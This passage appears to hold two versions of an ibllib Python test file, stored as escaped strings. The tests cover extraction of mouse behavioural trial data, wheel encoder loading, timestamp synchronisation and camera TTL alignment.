self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n # TRAINING SESSIONS\n rt = training_trials.ResponseTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n # -- version >= 5.0.0\n rt = training_trials.ResponseTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n # BIASED SESSIONS\n rt = biased_trials.ResponseTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n # -- version >= 5.0.0\n rt = biased_trials.ResponseTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n # TRAINING SESSIONS\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps']\n ['closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n # -- version >= 5.0.0\n gct = training_trials.GoCueTriggerTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n # BIASED SESSIONS\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps']\n ['closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n # -- version >= 5.0.0\n gct = biased_trials.GoCueTriggerTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n # TRAINING SESSIONS\n gcot = training_trials.GoCueTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n # -- version >= 5.0.0\n gcot = training_trials.GoCueTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n\n # BIASED SESSIONS\n gcot = 
biased_trials.GoCueTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n # -- version >= 5.0.0\n gcot = biased_trials.GoCueTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n # TRAINING SESSIONS\n it = training_trials.IncludedTrials(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # BIASED SESSIONS\n it = biased_trials.IncludedTrials(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n # TRAINING SESSIONS\n it = training_trials.IncludedTrials(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # BIASED SESSIONS\n it = biased_trials.IncludedTrials(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n # TRAINING SESSIONS\n it = training_trials.IncludedTrials(\n self.training_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # -- version >= 5.0.0\n it = training_trials.IncludedTrials(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n # BIASED SESSIONS\n it = biased_trials.IncludedTrials(\n self.biased_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # -- version >= 5.0.0\n it = biased_trials.IncludedTrials(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n # TRAINING SESSIONS\n # Expect an error raised because no wheel moves were present in test data\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(\n self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty', str(ex.exception))\n # -- version >= 5.0.0\n out, files = training_trials.extract_all(self.training_ge5['path'], save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n # BIASED SESSIONS\n # The new trials extractor additionally extracts the wheel data and this fails for the < 5.0\n # test data so we will stub the wheel extractor\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel') as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = ({}, [])\n out, files = biased_trials.extract_all(\n self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n # -- version >= 5.0.0\n out, files = biased_trials.extract_all(self.biased_ge5['path'], save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n # TRAINING SESSIONS\n # only for training?\n path = self.training_lt5['path'] / \"raw_behavior_data\"\n path = next(path.glob(\"_iblrig_encoderPositions.raw*.ssv\"), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206, 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n 
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n # here we test for 2 kinds of file corruption that happen\n # 1/2 the first sample time is corrupt and absurdly high and should be discarded\n # 2/2 2 samples are swapped and need to be swapped backk\n path = self.biased_lt5['path'] / \"raw_behavior_data\"\n path = next(path.glob(\"_iblrig_encoderPositions.raw*.ssv\"), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n # -- version >= 5.0.0\n path = self.biased_ge5['path'] / \"raw_behavior_data\"\n path = next(path.glob(\"_iblrig_encoderPositions.raw*.ssv\"), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n # the wheel folder contains other errors in bpod output that had to be addressed\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n # check the output dimensions\n # VERSION >= 5.0.0\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n # VERSION < 5.0.0\n # for these test data there are no wheel moves so let's mock the output\n mock_data = {\n 'intervals': np.array([[0, 1], ]),\n 'peakAmplitude': np.array([1, 1]),\n 'peakVelocity_times': np.array([1, 1])}\n function_name = 'ibllib.io.extractors.training_wheel.extract_wheel_moves'\n # Training\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n # Biased\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = 
alfio.load_object(self.biased_lt5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-6, -20]) # bpod starts 20 secs before with 10 ppm drift\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + .001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) -> None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = (\n \"some_file.csv\",\n \"some_file.tsv\",\n \"some_file.ssv\",\n \"some_file.npy\",\n )\n var_names = (\n \"csv\",\n \"ssv\",\n \"tsv\",\n \"npy\",\n )\n\n def _extract(self, **kwargs) -> tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n\n return (csv, ssv, tsv, npy)\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n def 
setUp(self) -> None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n # self.addClassCleanup(tempdir.cleanup) # py3.8\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n def test_groom_pin_state(self):\n # UNIT DATA\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n # Add drift\n ts += np.full_like(ts, 1e-4).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.\n audio = {'times': np.empty(n_pulses * 2),\n 'polarities': gpio['polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = (pulse_width * p) + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, 'Audio dict shouldn\\'t be effected')\n np.testing.assert_array_almost_equal(ts_[:4], [40., 40.016667, 40.033333, 40.05])\n\n # Broken TTLs + extra TTL\n delay = 0.08\n pulse_width = 1e-5\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t + pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff=5e-3)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n\n # One front shifted by a large amount\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, tolerance=.1, min_diff=5e-3)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41., 41.3])))\n\n def test_attribute_times(self, display=False):\n # Create two timestamp arrays at two different frequencies\n tsa = np.linspace(0, 60, 60 * 4)[:60] # 240bpm\n tsb = np.linspace(0, 60, 60 * 3)[:45] # 180bpm\n tsa = np.sort(np.append(tsa, .4)) # Add ambiguous front\n tsb = np.sort(np.append(tsb, .41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n\n # Check with default args\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array(\n [0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21,\n 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44,\n 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]\n )\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n\n # Taking closest instead of first should change index of ambiguous front\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n\n # Taking first after should exclude many pulses\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20,\n 22, 23, 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n 
expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n\n # Lower tolerance\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45, 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n\n # Remove injective assert\n matches = camera.attribute_times(tsa, tsb, injective=False, take='nearest')\n expected = np.array(\n [0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22,\n 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44, 45,\n 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]\n )\n np.testing.assert_array_equal(matches, expected)\n\n # Check input validation\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\nif __name__ == \"__main__\":\n unittest.main(exit=False, verbosity=2)\n", "import functools\nimport shutil\nimport tempfile\nimport unittest\nimport unittest.mock\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nimport one.alf.io as alfio\nfrom ibllib.io.extractors import training_trials, biased_trials, camera\nfrom ibllib.io import raw_data_loaders as raw\nfrom ibllib.io.extractors.base import BaseExtractor\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n\n @functools.wraps(func)\n def wrapper(obj=None):\n attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'\n ]\n alf_paths = [(getattr(obj, p)['path'] / 'alf') for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n func(obj)\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = 
training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = 
biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n 
self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def 